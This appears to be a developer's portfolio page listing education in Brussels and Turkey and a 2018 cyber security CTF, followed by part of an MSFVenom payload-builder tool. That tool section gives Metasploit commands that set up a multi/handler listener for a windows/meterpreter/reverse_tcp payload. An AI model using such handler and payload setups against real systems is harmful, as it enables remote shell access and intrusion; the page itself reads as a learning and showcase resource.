Atilla.js
Fullstack Developer & SysAdmin

Education

  • Graduaat Programmeren
    Erasmushogeschool Brussel / 2023 - Present
    Currently pursuing a degree in Programming at Erasmushogeschool Brussel, focusing on software development, operating systems, team collaboration, and professional communication skills.
  • High School Diploma
    Turkey / 2009 - 2013
    Completed secondary education with a comprehensive curriculum including Mathematics, Physics, Chemistry, Biology, Turkish, English, and Computer Science.

Languages

Events & Honors

  • Cyber Security [ctf]

    Siber Yildiz [2018] was a cyber security competition organized by USOM. I did not win the competition but I have learned a lot

  • InfoSec Reports

MSFVenom - Generate a msfvenom payload

MSFVenom Builder
Msfvenom is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit.
MSFVenom Command
Launch Console & Load Handler
Load Handler Only
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 1337
run